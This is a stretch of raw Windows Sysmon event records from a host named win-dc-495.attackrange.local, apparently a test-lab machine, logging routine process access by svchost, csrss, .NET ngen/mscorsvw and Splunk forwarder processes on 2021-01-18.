13:50:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.742{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9238-6005-2204-00000000A301}4756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.742{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9238-6005-2204-00000000A301}4756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.603{59A5CD1D-9238-6005-2204-00000000A301}4756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:48.320{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9238-6005-2104-00000000A301}2188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.305{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9238-6005-2104-00000000A301}2188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:48.305{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9238-6005-2104-00000000A301}2188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:48.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9238-6005-2004-00000000A301}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.133{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9238-6005-2004-00000000A301}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:48.133{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9238-6005-2004-00000000A301}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.117{59A5CD1D-9237-6005-1F04-00000000A301}3180920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000008401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:48.024{59A5CD1D-9236-6005-1D04-00000000A301}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1210-0\System.Data.Linq.dll2021-01-18 13:50:48.024 10341000x80000000000000008429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:49.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9239-6005-2404-00000000A301}3732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:49.336{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9239-6005-2404-00000000A301}3732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:49.336{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9239-6005-2404-00000000A301}3732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:50.727{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-923A-6005-2704-00000000A301}3416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.711{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-923A-6005-2704-00000000A301}3416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:50.711{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-923A-6005-2704-00000000A301}3416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:50.648{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-923A-6005-2604-00000000A301}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.633{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-923A-6005-2604-00000000A301}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:50.633{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-923A-6005-2604-00000000A301}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:50.539{59A5CD1D-9239-6005-2404-00000000A301}3732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e94-0\System.Data.Services.dll2021-01-18 13:50:50.539 10341000x80000000000000008442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:50.039{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9239-6005-2504-00000000A301}5108C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:50.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
